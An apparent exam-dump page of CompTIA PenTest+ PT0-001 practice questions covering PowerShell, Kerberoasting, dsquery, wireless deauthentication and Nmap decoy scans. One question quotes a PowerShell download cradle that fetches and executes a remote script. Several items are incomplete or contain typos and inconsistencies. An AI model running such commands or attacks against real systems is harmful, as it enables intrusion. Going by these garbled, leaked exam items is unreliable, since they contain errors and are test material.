November/2019 Braindump2go PT0-001 Dumps with PDF and VCE New Updated Today! Following are some new PT0-001 Exam Questions,
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1″);Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?
A. Set the execution policy.
B. Execute a remote script.
C. Run an encoded command.
D. Instantiate an object.
Which of the following excerpts would come from a corporate policy?
A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
B. The help desk can be reached at 800-passwd1 to perform password resets.
C. Employees must use strong passwords for accessing corporate assets.
D. The corporate systems must store passwords using the MD5 hashing algorithm.
In which of the following scenarios would a tester perform a Kerberoasting attack?
A. The tester has compromised a Windows device and dumps the LSA secrets.
B. The tester needs to retrieve the SAM database and crack the password hashes.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.
Kerberoasting is a technique that relies on requesting service tickets for service account service principal names (SPNs). The tickets are encrypted with the password of the service account associated with the SPN, meaning that once a tester has obtained the service tickets by using a tool like Mimikatz, the tester can crack the tickets to obtain the service account password using offline cracking tools. Kerberoasting is a four-step process:
Scan Active Directory for user accounts with service principal names (SPNs) set.
Request service tickets using the SPNs.
Extract the service tickets from memory and save to a file.
Conduct an offline brute-force attack against the passwords in the service tickets
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?
A. dsrm -users “DN=company.com; OU=hq CN=users”
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
Dsquery.exe is a command-line utility for finding information about various objects in the Active Directory domain. The utility is available in all Windows Server versions by default. The dsquery command allows you to query the LDAP directory to find objects that meet the specified criteria. As an attribute of the dsquery command, you need to specify the type of the AD object that you are searching for. In this scenario, you are looking for user accounts that have been inactive for the past 30 days, so you would use dsquery user -inactive < NumWeeks >.
Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?
A. Creating a scope of the critical production systems
B. Setting a schedule of testing access times
C. Establishing a white-box testing engagement
D. Having management sign off on intrusive testing
Drag and Drop Question
Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented. Each password may be used only once.
Drag and Drop Question
A manager calls upon a tester to assist with diagnosing an issue within the following Python script:
s = “Administrator”
The tester suspects it is an issue with string slicing and manipulation. Analyze the following code segment and drag and drop the correct output for each string manipulation to its corresponding code segment. Options may be used once or not at all.
A penetration tester ran the following Nmap scan on a computer nmap -sV 192.168.1.5.
The organization said it had disabled Telnet from its environment.
However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.
Which of the following is the BEST explanation for what happened?
A. The organization failed to disable Telnet.
B. Nmap results contain a false positive for port 23.
C. Port 22 was filtered.
D. The service is running on a non-standard port.
A penetration testet is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network.
The (ester is monitoring the correct channel tor the identified network but has been unsuccessful in capturing a handshake Given this scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?
A. Karma attack
B. Deauthentication attack
C. Fragmentation attack
D. SSID broadcast flood
A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.
The tester runs the following command:
nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o –max-rate 2 192.168.1.130
Which of the following BEST describes why multiple IP addresses are specified?
A. The network is submitted as a /25 or greater and the tester needed to access hosts on two different subnets
B. The tester is trying to perform a more stealthy scan by including several bogus addresses
C. The scanning machine has several interfaces to balance the scan request across at the specified rate
D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.
-D <decoy1,decoy2[,ME],…>: Cloak a scan with decoys
1.|2019 Latest Braindump2go PT0-001 Exam Dumps (VCE & PDF) Instant Download:
2.|2019 Latest Braindump2go PT0-001 Exam Questions & Answers Instant Download: